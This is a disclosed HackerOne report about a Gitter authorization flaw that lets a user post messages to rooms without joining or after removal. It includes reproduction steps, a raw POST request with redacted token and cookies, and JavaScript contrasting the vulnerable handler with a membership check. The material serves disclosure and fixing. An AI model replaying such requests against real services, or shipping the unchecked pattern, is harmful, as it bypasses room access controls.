Bypass "Only GitHub users" setting and send message in room via API without joining

HackerOne report #469272 by cache-money on 2018-12-18:

Summary: It's possible to post to a group on Gitter without actually joining the group. Your messages come up as if you're a member.

Steps To Reproduce:

  1. Login to Gitter and click into a group. Look at the request to /api/v1/user/[GROUP ID]/rooms to get the Group ID.
  2. Play the following request with that Group ID and notice the message will be posted.

POST /api/v1/rooms/[GROUP ID]/chatMessages HTTP/1.1
Host: gitter.im
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitter.im/MakoChat/community/~chat
Content-Type: application/json
x-access-token: [TOKEN]
X-Requested-With: XMLHttpRequest
Content-Length: 21
Cookie: [COOKIES]
DNT: 1
Connection: close

{"text":":thumbsup:"}

Impact

You can post to groups without ever joining or after you've been removed.

Relevant code

  • https://gitlab.com/gitlab-org/gitter/webapp/blob/3ea61ae3eb51470ab35798b051ce3b1997d1514c/server/api/v1/rooms/chat-messages.js#L81-93
  • https://gitlab.com/gitlab-org/gitter/webapp/blob/3ea61ae3eb51470ab35798b051ce3b1997d1514c/modules/chats/lib/chat-service.js#L128-225
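The missing check the report describes, shown as an added example that is neither the reporter's nor Gitter's own code: the in-memory rooms, users, provider restriction and `ForbiddenError` are constructed assumptions, and the point is that a chat-message endpoint must gate on current room membership rather than on a valid token alone, so that the room's join-time policy (such as "Only GitHub users") cannot be skipped by posting directly.

```javascript
// Constructed sample data standing in for the webapp's room/user services.
const rooms = new Map([
  ['room-1', { members: new Set(['alice']), providers: ['github'] }],
]);
const users = new Map([
  ['alice', { provider: 'github' }],
  ['bob', { provider: 'github' }],
  ['mallory', { provider: 'twitter' }],
]);

class ForbiddenError extends Error {
  constructor(message) { super(message); this.status = 403; }
}

// Vulnerable pattern: any authenticated user may post to any room id.
function postMessageUnchecked(roomId, userId, text) {
  const room = rooms.get(roomId);
  if (!room) throw new Error('room not found');
  return { roomId, fromUser: userId, text };
}

// Hardened pattern: the caller must be a current member of the room.
// Never joining, or having been removed, both leave the user out of the
// membership set, so a still-valid token or cookie does not grant posting.
function postMessageChecked(roomId, userId, text) {
  const room = rooms.get(roomId);
  if (!room) throw new Error('room not found');
  if (!room.members.has(userId)) throw new ForbiddenError('not a room member');
  return { roomId, fromUser: userId, text };
}

// Joining is where the provider restriction is enforced; with posting gated
// on membership, that restriction holds for the chat-message endpoint too.
function joinRoom(roomId, userId) {
  const room = rooms.get(roomId);
  const user = users.get(userId);
  if (!room || !user) throw new Error('room or user not found');
  if (room.providers.length && !room.providers.includes(user.provider)) {
    throw new ForbiddenError('room restricted to ' + room.providers.join(', '));
  }
  room.members.add(userId);
  return true;
}

function removeFromRoom(roomId, userId) {
  return rooms.get(roomId).members.delete(userId);
}
```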
Edited Dec 18, 2018 by Eric Eastwood